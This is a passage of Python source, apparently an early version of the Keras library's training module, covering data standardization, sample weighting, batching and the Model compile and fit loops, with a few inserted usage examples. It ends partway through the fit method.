training.py
from __future__ import print_function
from __future__ import absolute_import
import warnings
import copy
import time
import numpy as np
import multiprocessing
import threading
import six
try:
import queue
except ImportError:
import Queue as queue
from .topology import Container
from .. import backend as K
from .. import optimizers
from .. import objectives
from .. import metrics as metrics_module
from ..utils.generic_utils import Progbar
from .. import callbacks as cbks
def standardize_input_data(data, names, shapes=None,
check_batch_dim=True,
exception_prefix=''):
'''Users may pass data as a list of arrays, dictionary of arrays,
or as a single array. We normalize this to an ordered list of
arrays (same order as `names`), while checking that the provided
arrays have shapes that match the network's expectations.
'''
if type(data) is dict:
arrays = []
for name in names:
if name not in data:
raise Exception('No data provided for "' +
name + '". Need data for each key in: ' +
str(data.keys()))
arrays.append(data[name])
elif type(data) is list:
if len(data) != len(names):
if len(data) > 0 and hasattr(data[0], 'shape'):
raise Exception('Error when checking ' + exception_prefix +
': the list of Numpy arrays '
'that you are passing to your model '
'is not the size the model expected. '
'Expected to see ' + str(len(names)) +
' arrays but instead got '
'the following list of ' + str(len(data)) +
' arrays: ' + str(data)[:200] +
'...')
else:
if len(names) == 1:
data = [np.asarray(data)]
else:
raise Exception('Error when checking ' + exception_prefix +
': you are passing a list as '
'input to your model, '
'but the model expects '
'a list of ' + str(len(names)) +
' Numpy arrays instead. '
'The list you passed was: ' +
str(data)[:200])
arrays = data
else:
if not hasattr(data, 'shape'):
raise Exception('Error when checking ' + exception_prefix +
': data should be a Numpy array, '
'or list/dict of Numpy arrays. '
'Found: ' + str(data)[:200] + '...')
if len(names) != 1:
# case: model expects multiple inputs but only received
# a single Numpy array
raise Exception('The model expects ' + str(len(names)) +
' input arrays, but only received one array. '
'Found: array with shape ' + str(data.shape))
arrays = [data]
# make arrays at least 2D
for i in range(len(names)):
array = arrays[i]
if len(array.shape) == 1:
array = np.expand_dims(array, 1)
arrays[i] = array
# check shapes compatibility
if shapes:
for i in range(len(names)):
if shapes[i] is None:
continue
array = arrays[i]
if len(array.shape) != len(shapes[i]):
raise Exception('Error when checking ' + exception_prefix +
': expected ' + names[i] +
' to have ' + str(len(shapes[i])) +
' dimensions, but got array with shape ' +
str(array.shape))
for j, (dim, ref_dim) in enumerate(zip(array.shape, shapes[i])):
if not j and not check_batch_dim:
# skip the first axis
continue
if ref_dim:
if ref_dim != dim:
raise Exception('Error when checking ' + exception_prefix +
': expected ' + names[i] +
' to have shape ' + str(shapes[i]) +
' but got array with shape ' +
str(array.shape))
return arrays
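# Editor's note: a minimal usage sketch, not part of the original module, showing
# how `standardize_input_data` turns a dict keyed by input names into an ordered
# list of at-least-2D arrays checked against the expected shapes. The names and
# shapes below are illustrative only.
def _example_standardize_input_data():
    data = {'input_a': np.arange(6), 'input_b': np.arange(6) * 2}
    arrays = standardize_input_data(data,
                                    names=['input_a', 'input_b'],
                                    shapes=[(None, 1), (None, 1)],
                                    check_batch_dim=False,
                                    exception_prefix='example input')
    # Each 1D array of length 6 comes back with shape (6, 1), in `names` order.
    return arrays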
def standardize_sample_or_class_weights(x_weight, output_names, weight_type):
if x_weight is None or len(x_weight) == 0:
return [None for _ in output_names]
if len(output_names) == 1:
if type(x_weight) is list and len(x_weight) == 1:
return x_weight
if type(x_weight) is dict and output_names[0] in x_weight:
return [x_weight[output_names[0]]]
else:
return [x_weight]
if type(x_weight) is list:
if len(x_weight) != len(output_names):
raise Exception('Provided `' + weight_type + '` was a list of ' +
str(len(x_weight)) +
' elements, but the model has ' +
str(len(output_names)) + ' outputs. '
'You should provide one `' + weight_type + '`'
'array per model output.')
return x_weight
if type(x_weight) is dict:
x_weights = []
for name in output_names:
x_weights.append(x_weight.get(name))
return x_weights
else:
raise Exception('The model has multiple outputs, so `' +
weight_type + '` '
                        'should be either a list or a dict. '
'Provided `' + weight_type +
'` type not understood: ' +
str(x_weight))
def standardize_class_weights(class_weight, output_names):
return standardize_sample_or_class_weights(class_weight,
output_names,
'class_weight')
def standardize_sample_weights(sample_weight, output_names):
return standardize_sample_or_class_weights(sample_weight,
output_names,
'sample_weight')
def check_array_lengths(X, Y, W):
x_lengths = [x.shape[0] for x in X]
y_lengths = [y.shape[0] for y in Y]
w_lengths = [w.shape[0] for w in W]
set_x = set(x_lengths)
if len(set_x) != 1:
raise Exception('All input arrays (x) should have '
'the same number of samples.')
set_y = set(y_lengths)
if len(set_y) != 1:
raise Exception('All target arrays (y) should have '
'the same number of samples.')
set_w = set(w_lengths)
if len(set_w) != 1:
raise Exception('All sample_weight arrays should have '
'the same number of samples.')
if list(set_x)[0] != list(set_y)[0]:
raise Exception('Input arrays should have '
'the same number of samples as target arrays. Found ' +
str(list(set_x)[0]) + ' input samples and ' +
str(list(set_y)[0]) + ' target samples.')
if list(set_x)[0] != list(set_w)[0]:
raise Exception('Sample_weight arrays should have '
'the same number of samples as input arrays. Found ' +
str(list(set_x)[0]) + ' input samples and ' +
                        str(list(set_w)[0]) + ' sample_weight samples.')
def check_loss_and_target_compatibility(targets, losses, output_shapes):
    key_losses = {'mean_squared_error',
'binary_crossentropy',
'categorical_crossentropy'}
for y, loss, shape in zip(targets, losses, output_shapes):
if loss.__name__ == 'categorical_crossentropy':
if y.shape[-1] == 1:
raise Exception('You are passing a target array of shape ' + str(y.shape) +
' while using as loss `categorical_crossentropy`. '
'`categorical_crossentropy` expects '
'targets to be binary matrices (1s and 0s) '
'of shape (samples, classes). '
'If your targets are integer classes, '
'you can convert them to the expected format via:\n'
'```\n'
'from keras.utils.np_utils import to_categorical\n'
'y_binary = to_categorical(y_int)\n'
'```\n'
'\n'
'Alternatively, you can use the loss function '
'`sparse_categorical_crossentropy` instead, '
'which does expect integer targets.')
if loss.__name__ in key_losses:
for target_dim, out_dim in zip(y.shape[1:], shape[1:]):
if out_dim is not None and target_dim != out_dim:
raise Exception('A target array with shape ' + str(y.shape) +
' was passed for an output of shape ' + str(shape) +
' while using as loss `' + loss.__name__ + '`. '
'This loss expects '
'targets to have the same shape '
'as the output.')
def collect_metrics(metrics, output_names):
if not metrics:
return [[] for _ in output_names]
if type(metrics) is list:
# we then apply all metrics to all outputs.
return [copy.copy(metrics) for _ in output_names]
elif type(metrics) is dict:
nested_metrics = []
for name in output_names:
output_metrics = metrics.get(name, [])
if type(output_metrics) is not list:
output_metrics = [output_metrics]
nested_metrics.append(output_metrics)
return nested_metrics
else:
raise Exception('Type of `metrics` argument not understood. '
'Expected a list or dictionary, found: ' +
str(metrics))
def batch_shuffle(index_array, batch_size):
'''This shuffles an array in a batch-wise fashion.
Useful for shuffling HDF5 arrays
(where one cannot access arbitrary indices).
'''
batch_count = int(len(index_array) / batch_size)
# to reshape we need to be cleanly divisible by batch size
# we stash extra items and reappend them after shuffling
last_batch = index_array[batch_count * batch_size:]
index_array = index_array[:batch_count * batch_size]
index_array = index_array.reshape((batch_count, batch_size))
np.random.shuffle(index_array)
index_array = index_array.flatten()
return np.append(index_array, last_batch)
def make_batches(size, batch_size):
'''Returns a list of batch indices (tuples of indices).
'''
nb_batch = int(np.ceil(size / float(batch_size)))
return [(i * batch_size, min(size, (i + 1) * batch_size))
for i in range(0, nb_batch)]
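# Editor's note: a small illustration, not in the original source, of what
# `make_batches` returns: (start, end) index pairs covering `size` samples,
# where the final batch may be smaller than `batch_size`.
def _example_make_batches():
    batches = make_batches(size=10, batch_size=4)
    assert batches == [(0, 4), (4, 8), (8, 10)]
    return batches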
def slice_X(X, start=None, stop=None):
'''This takes an array-like, or a list of
array-likes, and outputs:
- X[start:stop] if X is an array-like
        - [x[start:stop] for x in X] if X is a list
Can also work on list/array of indices: `slice_X(x, indices)`
# Arguments:
start: can be an integer index (start index)
or a list/array of indices
stop: integer (stop index); should be None if
`start` was a list.
'''
if type(X) == list:
if hasattr(start, '__len__'):
# hdf5 datasets only support list objects as indices
if hasattr(start, 'shape'):
start = start.tolist()
return [x[start] for x in X]
else:
return [x[start:stop] for x in X]
else:
if hasattr(start, '__len__'):
if hasattr(start, 'shape'):
start = start.tolist()
return X[start]
else:
return X[start:stop]
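# Editor's note: an illustrative sketch, not in the original source, of the two
# calling styles `slice_X` supports: a contiguous start/stop slice over a list of
# arrays, and fancy indexing with a list of indices over a single array.
def _example_slice_X():
    x = np.arange(10)
    pair = [np.arange(10), np.arange(10) * 2]
    contiguous = slice_X(pair, 0, 5)    # -> [arr[0:5] for arr in pair]
    by_indices = slice_X(x, [0, 2, 4])  # -> x[[0, 2, 4]]
    return contiguous, by_indices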
def weighted_objective(fn):
'''Transforms an objective function `fn(y_true, y_pred)`
into a sample-weighted, cost-masked objective function
`fn(y_true, y_pred, weights, mask)`.
'''
def weighted(y_true, y_pred, weights, mask=None):
# score_array has ndim >= 2
score_array = fn(y_true, y_pred)
if mask is not None:
# Cast the mask to floatX to avoid float64 upcasting in theano
mask = K.cast(mask, K.floatx())
# mask should have the same shape as score_array
score_array *= mask
# the loss per batch should be proportional
# to the number of unmasked samples.
score_array /= K.mean(mask)
# reduce score_array to same ndim as weight array
ndim = K.ndim(score_array)
weight_ndim = K.ndim(weights)
score_array = K.mean(score_array, axis=list(range(weight_ndim, ndim)))
# apply sample weighting
if weights is not None:
score_array *= weights
score_array /= K.mean(K.cast(K.not_equal(weights, 0), K.floatx()))
return K.mean(score_array)
return weighted
def standardize_weights(y, sample_weight=None, class_weight=None,
sample_weight_mode=None):
'''Performs weight input validation and standardization
to a single sample-wise (or timestep-wise) weight array.
'''
if sample_weight_mode is not None:
if sample_weight_mode != 'temporal':
            raise Exception('"sample_weight_mode" '
'should be None or "temporal". '
'Found: ' + str(sample_weight_mode))
if len(y.shape) < 3:
raise Exception('Found a sample_weight array for '
'an input with shape ' +
str(y.shape) + '. '
'Timestep-wise sample weighting (use of '
'sample_weight_mode="temporal") is restricted to '
'outputs that are at least 3D, i.e. that have '
'a time dimension.')
if sample_weight is not None and len(sample_weight.shape) != 2:
raise Exception('Found a sample_weight array with shape ' +
str(sample_weight.shape) + '. '
'In order to use timestep-wise sample weighting, '
'you should pass a 2D sample_weight array.')
else:
if sample_weight is not None and len(sample_weight.shape) != 1:
raise Exception('Found a sample_weight array with shape ' +
str(sample_weight.shape) + '. '
'In order to use timestep-wise sample weights, '
'you should specify sample_weight_mode="temporal" '
'in compile(). If you just mean to use '
'sample-wise weights, make sure your '
'sample_weight array is 1D.')
if sample_weight is not None:
assert len(sample_weight.shape) <= len(y.shape)
# TODO: proper error message
assert y.shape[:sample_weight.ndim] == sample_weight.shape
return sample_weight
elif isinstance(class_weight, dict):
if len(y.shape) > 2:
raise Exception('class_weight not supported for '
'3+ dimensional targets.')
if y.shape[1] > 1:
y_classes = y.argmax(axis=1)
elif y.shape[1] == 1:
y_classes = np.reshape(y, y.shape[0])
else:
y_classes = y
weights = np.asarray([class_weight[cls] for cls in y_classes])
return weights
else:
if sample_weight_mode is None:
return np.ones((y.shape[0],), dtype=K.floatx())
else:
return np.ones((y.shape[0], y.shape[1]), dtype=K.floatx())
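# Editor's note: a minimal sketch, not part of the original module, showing how a
# `class_weight` dict is expanded into per-sample weights for integer targets.
def _example_standardize_weights():
    y = np.array([[0], [1], [1], [0]])  # binary class targets, shape (4, 1)
    weights = standardize_weights(y, class_weight={0: 1., 1: 5.})
    # -> array([1., 5., 5., 1.]): one weight per sample, looked up by its class.
    return weights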
def generator_queue(generator, max_q_size=10,
wait_time=0.05, nb_worker=1, pickle_safe=False):
'''Builds a queue out of a data generator.
If pickle_safe, use a multiprocessing approach. Else, use threading.
Used in `fit_generator`, `evaluate_generator`, `predict_generator`.
'''
generator_threads = []
if pickle_safe:
q = multiprocessing.Queue(maxsize=max_q_size)
_stop = multiprocessing.Event()
else:
q = queue.Queue()
_stop = threading.Event()
try:
def data_generator_task():
while not _stop.is_set():
try:
if pickle_safe or q.qsize() < max_q_size:
generator_output = next(generator)
q.put(generator_output)
else:
time.sleep(wait_time)
except Exception:
_stop.set()
raise
for i in range(nb_worker):
if pickle_safe:
                # Re-seed the RNG, otherwise all child processes share the same seed
np.random.seed()
thread = multiprocessing.Process(target=data_generator_task)
else:
thread = threading.Thread(target=data_generator_task)
generator_threads.append(thread)
thread.daemon = True
thread.start()
except:
_stop.set()
if pickle_safe:
# Terminate all daemon processes
for p in generator_threads:
if p.is_alive():
p.terminate()
q.close()
raise
return q, _stop, generator_threads
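# Editor's note: a hedged usage sketch, not part of the original module. It pulls
# one batch off the queue and then signals the worker to stop; the fit/evaluate/
# predict_generator methods below poll the same queue in a loop instead.
def _example_generator_queue(batch_generator):
    q, _stop, _threads = generator_queue(batch_generator, max_q_size=4, nb_worker=1)
    try:
        first_batch = q.get(timeout=10)  # blocks until a worker enqueues a batch
    finally:
        _stop.set()                      # ask the worker thread to exit its loop
    return first_batch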
class Model(Container):
def compile(self, optimizer, loss, metrics=[], loss_weights=None,
sample_weight_mode=None, **kwargs):
'''Configures the model for training.
# Arguments
optimizer: str (name of optimizer) or optimizer object.
See [optimizers](/optimizers).
loss: str (name of objective function) or objective function.
See [objectives](/objectives).
If the model has multiple outputs, you can use a different loss
on each output by passing a dictionary or a list of objectives.
metrics: list of metrics to be evaluated by the model
during training and testing.
Typically you will use `metrics=['accuracy']`.
To specify different metrics for different outputs of a
multi-output model, you could also pass a dictionary,
such as `metrics={'output_a': 'accuracy'}`.
sample_weight_mode: if you need to do timestep-wise
sample weighting (2D weights), set this to "temporal".
"None" defaults to sample-wise weights (1D).
If the model has multiple outputs, you can use a different
`sample_weight_mode` on each output by passing a
dictionary or a list of modes.
kwargs: when using the Theano backend, these arguments
                are passed into K.function. Ignored for the TensorFlow backend.
'''
self.optimizer = optimizers.get(optimizer)
self.sample_weight_mode = sample_weight_mode
self.loss = loss
self.loss_weights = loss_weights
# prepare loss weights
if loss_weights is None:
loss_weights_list = [1. for _ in range(len(self.outputs))]
elif type(loss_weights) is dict:
for name in loss_weights:
if name not in self.output_names:
raise Exception('Unknown entry in loss_weights '
'dictionary: "' + name + '". '
'Only expected the following keys: ' +
str(self.output_names))
loss_weights_list = []
for name in self.output_names:
loss_weights_list.append(loss_weights.get(name, 1.))
elif type(loss_weights) is list:
if len(loss_weights) != len(self.outputs):
raise Exception('When passing a list as loss_weights, '
                                'it should have one entry per model output. '
'The model has ' + str(len(self.outputs)) +
' outputs, but you passed loss_weights=' +
str(loss_weights))
loss_weights_list = loss_weights
else:
raise Exception('Could not interpret loss_weights argument: ' +
str(loss_weights))
# prepare loss functions
if type(loss) is dict:
for name in loss:
if name not in self.output_names:
raise Exception('Unknown entry in loss '
'dictionary: "' + name + '". '
'Only expected the following keys: ' +
str(self.output_names))
loss_functions = []
for name in self.output_names:
if name not in loss:
raise Exception('Output "' + name +
'" missing from loss dictionary')
loss_functions.append(objectives.get(loss[name]))
elif type(loss) is list:
if len(loss) != len(self.outputs):
raise Exception('When passing a list as loss, '
                                'it should have one entry per model output. '
'The model has ' + str(len(self.outputs)) +
' outputs, but you passed loss=' +
str(loss))
loss_functions = [objectives.get(l) for l in loss]
else:
loss_function = objectives.get(loss)
loss_functions = [loss_function for _ in range(len(self.outputs))]
self.loss_functions = loss_functions
weighted_losses = [weighted_objective(fn) for fn in loss_functions]
# prepare output masks
masks = self.compute_mask(self.inputs, mask=None)
if masks is None:
masks = [None for _ in self.outputs]
if type(masks) is not list:
masks = [masks]
# prepare sample weights
if type(sample_weight_mode) is dict:
for name in sample_weight_mode:
if name not in self.output_names:
raise Exception('Unknown entry in '
'sample_weight_mode dictionary: "' +
name + '". '
'Only expected the following keys: ' +
str(self.output_names))
sample_weights = []
sample_weight_modes = []
for name in self.output_names:
if name not in sample_weight_mode:
raise Exception('Output "' + name +
'" missing from sample_weight_modes '
'dictionary')
if sample_weight_mode.get(name) == 'temporal':
weight = K.placeholder(ndim=2, name=name + '_sample_weights')
sample_weight_modes.append('temporal')
else:
weight = K.placeholder(ndim=1, name=name + '_sample_weights')
sample_weight_modes.append(None)
sample_weights.append(weight)
elif type(sample_weight_mode) is list:
if len(sample_weight_mode) != len(self.outputs):
raise Exception('When passing a list as sample_weight_mode, ' +
                                'it should have one entry per model output. '
'The model has ' + str(len(self.outputs)) +
' outputs, but you passed sample_weight_mode=' +
str(sample_weight_mode))
sample_weights = []
sample_weight_modes = []
for mode, name in zip(sample_weight_mode, self.output_names):
if mode == 'temporal':
weight = K.placeholder(ndim=2, name=name + '_sample_weights')
sample_weight_modes.append('temporal')
else:
weight = K.placeholder(ndim=1, name=name + '_sample_weights')
sample_weight_modes.append(None)
sample_weights.append(weight)
else:
if sample_weight_mode == 'temporal':
sample_weights = [K.placeholder(ndim=2, name=name + '_sample_weights')
for name in self.output_names]
sample_weight_modes = ['temporal' for name in self.output_names]
else:
sample_weights = [K.placeholder(ndim=1, name=name + '_sample_weights')
for name in self.output_names]
sample_weight_modes = [None for name in self.output_names]
self.sample_weight_modes = sample_weight_modes
# prepare targets of model
self.targets = []
for i in range(len(self.outputs)):
shape = self.internal_output_shapes[i]
name = self.output_names[i]
self.targets.append(K.placeholder(ndim=len(shape),
name=name + '_target',
sparse=K.is_sparse(self.outputs[i]),
dtype=K.dtype(self.outputs[i])))
# prepare metrics
self.metrics = metrics
self.metrics_names = ['loss']
self.metrics_tensors = []
# compute total loss
total_loss = None
for i in range(len(self.outputs)):
y_true = self.targets[i]
y_pred = self.outputs[i]
weighted_loss = weighted_losses[i]
sample_weight = sample_weights[i]
mask = masks[i]
loss_weight = loss_weights_list[i]
output_loss = weighted_loss(y_true, y_pred,
sample_weight, mask)
if len(self.outputs) > 1:
self.metrics_tensors.append(output_loss)
self.metrics_names.append(self.output_names[i] + '_loss')
if total_loss is None:
total_loss = loss_weight * output_loss
else:
total_loss += loss_weight * output_loss
# add regularization penalties to the loss
for r in self.regularizers:
total_loss = r(total_loss)
# list of same size as output_names.
# contains tuples (metrics for output, names of metrics)
nested_metrics = collect_metrics(metrics, self.output_names)
def append_metric(layer_num, metric_name, metric_tensor):
"""Helper function, used in loop below"""
if len(self.output_names) > 1:
metric_name = self.output_layers[layer_num].name + '_' + metric_name
self.metrics_names.append(metric_name)
self.metrics_tensors.append(metric_tensor)
for i in range(len(self.outputs)):
y_true = self.targets[i]
y_pred = self.outputs[i]
output_metrics = nested_metrics[i]
for metric in output_metrics:
if metric == 'accuracy' or metric == 'acc':
# custom handling of accuracy (because of class mode duality)
output_shape = self.internal_output_shapes[i]
acc_fn = None
if output_shape[-1] == 1 or self.loss_functions[i] == objectives.binary_crossentropy:
# case: binary accuracy
acc_fn = metrics_module.binary_accuracy
elif self.loss_functions[i] == objectives.sparse_categorical_crossentropy:
# case: categorical accuracy with sparse targets
acc_fn = metrics_module.sparse_categorical_accuracy
else:
acc_fn = metrics_module.categorical_accuracy
append_metric(i, 'acc', acc_fn(y_true, y_pred))
else:
metric_fn = metrics_module.get(metric)
metric_result = metric_fn(y_true, y_pred)
if not isinstance(metric_result, dict):
metric_result = {
metric_fn.__name__: metric_result
}
for name, tensor in six.iteritems(metric_result):
append_metric(i, name, tensor)
# prepare gradient updates and state updates
self.optimizer = optimizers.get(optimizer)
self.total_loss = total_loss
self.sample_weights = sample_weights
# functions for train, test and predict will
# be compiled lazily when required.
# This saves time when the user is not using all functions.
self._function_kwargs = kwargs
self.train_function = None
self.test_function = None
self.predict_function = None
        # collect trainable weights and sort them deterministically.
trainable_weights = self.trainable_weights
# Sort weights by name
if trainable_weights:
if K.backend() == 'theano':
trainable_weights.sort(key=lambda x: x.name if x.name else x.auto_name)
else:
trainable_weights.sort(key=lambda x: x.name)
self._collected_trainable_weights = trainable_weights
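    # Editor's note (illustration, not part of the original source): for a
    # multi-output model, `compile` accepts per-output losses, loss weights and
    # metrics keyed by output layer name, e.g.:
    #
    #     model.compile(optimizer='rmsprop',
    #                   loss={'main_output': 'binary_crossentropy',
    #                         'aux_output': 'mse'},
    #                   loss_weights={'main_output': 1., 'aux_output': 0.2},
    #                   metrics={'main_output': 'accuracy'})
    #
    # 'main_output' and 'aux_output' are hypothetical output layer names.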
def _make_train_function(self):
if not hasattr(self, 'train_function'):
raise Exception('You must compile your model before using it.')
if self.train_function is None:
if self.uses_learning_phase and type(K.learning_phase()) is not int:
inputs = self.inputs + self.targets + self.sample_weights + [K.learning_phase()]
else:
inputs = self.inputs + self.targets + self.sample_weights
training_updates = self.optimizer.get_updates(self._collected_trainable_weights,
self.constraints,
self.total_loss)
updates = self.updates + training_updates
# returns loss and metrics. Updates weights at each call.
self.train_function = K.function(inputs,
[self.total_loss] + self.metrics_tensors,
updates=updates,
**self._function_kwargs)
def _make_test_function(self):
if not hasattr(self, 'test_function'):
raise Exception('You must compile your model before using it.')
if self.test_function is None:
if self.uses_learning_phase and type(K.learning_phase()) is not int:
inputs = self.inputs + self.targets + self.sample_weights + [K.learning_phase()]
else:
inputs = self.inputs + self.targets + self.sample_weights
# return loss and metrics, no gradient updates.
# Does update the network states.
self.test_function = K.function(inputs,
[self.total_loss] + self.metrics_tensors,
updates=self.state_updates,
**self._function_kwargs)
def _make_predict_function(self):
if not hasattr(self, 'predict_function'):
self.predict_function = None
if self.predict_function is None:
if self.uses_learning_phase and type(K.learning_phase()) is not int:
inputs = self.inputs + [K.learning_phase()]
else:
inputs = self.inputs
# returns network outputs. Does not update weights.
# Does update the network states.
kwargs = getattr(self, '_function_kwargs', {})
self.predict_function = K.function(inputs,
self.outputs,
updates=self.state_updates,
**kwargs)
def _fit_loop(self, f, ins, out_labels=[], batch_size=32,
nb_epoch=100, verbose=1, callbacks=[],
val_f=None, val_ins=None, shuffle=True,
callback_metrics=[], initial_epoch=0):
'''Abstract fit function for f(ins).
Assume that f returns a list, labeled by out_labels.
# Arguments
f: Keras function returning a list of tensors
ins: list of tensors to be fed to `f`
out_labels: list of strings, display names of
the outputs of `f`
batch_size: integer batch size
nb_epoch: number of times to iterate over the data
verbose: verbosity mode, 0, 1 or 2
callbacks: list of callbacks to be called during training
val_f: Keras function to call for validation
val_ins: list of tensors to be fed to `val_f`
shuffle: whether to shuffle the data at the beginning of each epoch
callback_metrics: list of strings, the display names of the metrics
passed to the callbacks. They should be the
concatenation of list the display names of the outputs of
`f` and the list of display names of the outputs of `f_val`.
initial_epoch: epoch at which to start training
(useful for resuming a previous training run)
# Returns
`History` object.
'''
do_validation = False
if val_f and val_ins:
do_validation = True
if verbose:
print('Train on %d samples, validate on %d samples' %
(ins[0].shape[0], val_ins[0].shape[0]))
nb_train_sample = ins[0].shape[0]
index_array = np.arange(nb_train_sample)
self.history = cbks.History()
callbacks = [cbks.BaseLogger()] + callbacks + [self.history]
if verbose:
callbacks += [cbks.ProgbarLogger()]
callbacks = cbks.CallbackList(callbacks)
# it's possible to callback a different model than self
# (used by Sequential models)
if hasattr(self, 'callback_model') and self.callback_model:
callback_model = self.callback_model
else:
callback_model = self
callbacks._set_model(callback_model)
callbacks._set_params({
'batch_size': batch_size,
'nb_epoch': nb_epoch,
'nb_sample': nb_train_sample,
'verbose': verbose,
'do_validation': do_validation,
'metrics': callback_metrics,
})
callbacks.on_train_begin()
callback_model.stop_training = False
self.validation_data = val_ins
for epoch in range(initial_epoch, nb_epoch):
callbacks.on_epoch_begin(epoch)
if shuffle == 'batch':
index_array = batch_shuffle(index_array, batch_size)
elif shuffle:
np.random.shuffle(index_array)
batches = make_batches(nb_train_sample, batch_size)
epoch_logs = {}
for batch_index, (batch_start, batch_end) in enumerate(batches):
batch_ids = index_array[batch_start:batch_end]
try:
if type(ins[-1]) is float:
# do not slice the training phase flag
ins_batch = slice_X(ins[:-1], batch_ids) + [ins[-1]]
else:
ins_batch = slice_X(ins, batch_ids)
except TypeError:
raise Exception('TypeError while preparing batch. '
'If using HDF5 input data, '
'pass shuffle="batch".')
batch_logs = {}
batch_logs['batch'] = batch_index
batch_logs['size'] = len(batch_ids)
callbacks.on_batch_begin(batch_index, batch_logs)
outs = f(ins_batch)
if type(outs) != list:
outs = [outs]
for l, o in zip(out_labels, outs):
batch_logs[l] = o
callbacks.on_batch_end(batch_index, batch_logs)
if batch_index == len(batches) - 1: # last batch
# validation
if do_validation:
# replace with self._evaluate
val_outs = self._test_loop(val_f, val_ins,
batch_size=batch_size,
verbose=0)
if type(val_outs) != list:
val_outs = [val_outs]
# same labels assumed
for l, o in zip(out_labels, val_outs):
epoch_logs['val_' + l] = o
callbacks.on_epoch_end(epoch, epoch_logs)
if callback_model.stop_training:
break
callbacks.on_train_end()
return self.history
def _predict_loop(self, f, ins, batch_size=32, verbose=0):
'''Abstract method to loop over some data in batches.
# Arguments
f: Keras function returning a list of tensors.
ins: list of tensors to be fed to `f`.
batch_size: integer batch size.
verbose: verbosity mode.
# Returns
Array of predictions (if the model has a single output)
or list of arrays of predictions
(if the model has multiple outputs).
'''
nb_sample = ins[0].shape[0]
outs = []
if verbose == 1:
progbar = Progbar(target=nb_sample)
batches = make_batches(nb_sample, batch_size)
index_array = np.arange(nb_sample)
for batch_index, (batch_start, batch_end) in enumerate(batches):
batch_ids = index_array[batch_start:batch_end]
if type(ins[-1]) is float:
# do not slice the training phase flag
ins_batch = slice_X(ins[:-1], batch_ids) + [ins[-1]]
else:
ins_batch = slice_X(ins, batch_ids)
batch_outs = f(ins_batch)
if type(batch_outs) != list:
batch_outs = [batch_outs]
if batch_index == 0:
for batch_out in batch_outs:
shape = (nb_sample,) + batch_out.shape[1:]
outs.append(np.zeros(shape, dtype=K.floatx()))
for i, batch_out in enumerate(batch_outs):
outs[i][batch_start:batch_end] = batch_out
if verbose == 1:
progbar.update(batch_end)
if len(outs) == 1:
return outs[0]
return outs
def _test_loop(self, f, ins, batch_size=32, verbose=0):
'''Abstract method to loop over some data in batches.
# Arguments
f: Keras function returning a list of tensors.
ins: list of tensors to be fed to `f`.
batch_size: integer batch size.
verbose: verbosity mode.
# Returns
Scalar loss (if the model has a single output and no metrics)
or list of scalars (if the model has multiple outputs
and/or metrics). The attribute `model.metrics_names` will give you
the display labels for the scalar outputs.
'''
nb_sample = ins[0].shape[0]
outs = []
if verbose == 1:
progbar = Progbar(target=nb_sample)
batches = make_batches(nb_sample, batch_size)
index_array = np.arange(nb_sample)
for batch_index, (batch_start, batch_end) in enumerate(batches):
batch_ids = index_array[batch_start:batch_end]
if type(ins[-1]) is float:
# do not slice the training phase flag
ins_batch = slice_X(ins[:-1], batch_ids) + [ins[-1]]
else:
ins_batch = slice_X(ins, batch_ids)
batch_outs = f(ins_batch)
if type(batch_outs) == list:
if batch_index == 0:
                    for batch_out in batch_outs:
outs.append(0.)
for i, batch_out in enumerate(batch_outs):
outs[i] += batch_out * len(batch_ids)
else:
if batch_index == 0:
outs.append(0.)
outs[0] += batch_outs * len(batch_ids)
if verbose == 1:
progbar.update(batch_end)
for i, out in enumerate(outs):
outs[i] /= nb_sample
if len(outs) == 1:
return outs[0]
return outs
def _standardize_user_data(self, x, y,
sample_weight=None, class_weight=None,
check_batch_dim=True, batch_size=None):
if not hasattr(self, 'optimizer'):
raise Exception('You must compile a model before training/testing.'
' Use `model.compile(optimizer, loss)`.')
output_shapes = []
for output_shape, loss_fn in zip(self.internal_output_shapes, self.loss_functions):
if loss_fn.__name__ == 'sparse_categorical_crossentropy':
output_shapes.append(output_shape[:-1] + (1,))
elif getattr(objectives, loss_fn.__name__, None) is None:
output_shapes.append(None)
else:
output_shapes.append(output_shape)
x = standardize_input_data(x, self.input_names,
self.internal_input_shapes,
check_batch_dim=False,
exception_prefix='model input')
y = standardize_input_data(y, self.output_names,
output_shapes,
check_batch_dim=False,
exception_prefix='model target')
sample_weights = standardize_sample_weights(sample_weight,
self.output_names)
class_weights = standardize_class_weights(class_weight,
self.output_names)
sample_weights = [standardize_weights(ref, sw, cw, mode)
for (ref, sw, cw, mode)
in zip(y, sample_weights, class_weights, self.sample_weight_modes)]
check_array_lengths(x, y, sample_weights)
check_loss_and_target_compatibility(y, self.loss_functions, self.internal_output_shapes)
if self.stateful and batch_size:
if x[0].shape[0] % batch_size != 0:
raise Exception('In a stateful network, '
'you should only pass inputs with '
'a number of samples that can be '
'divided by the batch size. Found: ' +
str(x[0].shape[0]) + ' samples')
return x, y, sample_weights
def fit(self, x, y, batch_size=32, nb_epoch=10, verbose=1, callbacks=[],
validation_split=0., validation_data=None, shuffle=True,
class_weight=None, sample_weight=None, initial_epoch=0):
'''Trains the model for a fixed number of epochs (iterations on a dataset).
# Arguments
x: Numpy array of training data,
or list of Numpy arrays if the model has multiple inputs.
If all inputs in the model are named, you can also pass a dictionary
mapping input names to Numpy arrays.
y: Numpy array of target data,
or list of Numpy arrays if the model has multiple outputs.
If all outputs in the model are named, you can also pass a dictionary
mapping output names to Numpy arrays.
batch_size: integer. Number of samples per gradient update.
nb_epoch: integer, the number of times to iterate over the training data arrays.
verbose: 0, 1, or 2. Verbosity mode. 0 = silent, 1 = verbose, 2 = one log line per epoch.
callbacks: list of callbacks to be called during training.
See [callbacks](/callbacks).
validation_split: float between 0 and 1:
fraction of the training data to be used as validation data.
The model will set apart this fraction of the training data,
will not train on it, and will evaluate the loss and any model metrics
on this data at the end of each epoch.
validation_data: data on which to evaluate the loss and any model metrics
at the end of each epoch. The model will not be trained on this data.
This could be a tuple (x_val, y_val) or a tuple (x_val, y_val, val_sample_weights).
shuffle: boolean, whether to shuffle the training data before each epoch.
class_weight: optional dictionary mapping class indices (integers) to
a weight (float) to apply to the model's loss for the samples
from this class during training.
This can be useful to tell the model to "pay more attention" to
samples from an under-represented class.
sample_weight: optional array of the same length as x, containing
weights to apply to the model's loss for each sample.
In the case of temporal data, you can pass a 2D array
with shape (samples, sequence_length),
to apply a different weight to every timestep of every sample.
In this case you should make sure to specify sample_weight_mode="temporal" in compile().
initial_epoch: epoch at which to start training
(useful for resuming a previous training run)
# Returns
A `History` instance. Its `history` attribute contains
all information collected during training.
'''
# validate user data
x, y, sample_weights = self._standardize_user_data(x, y,
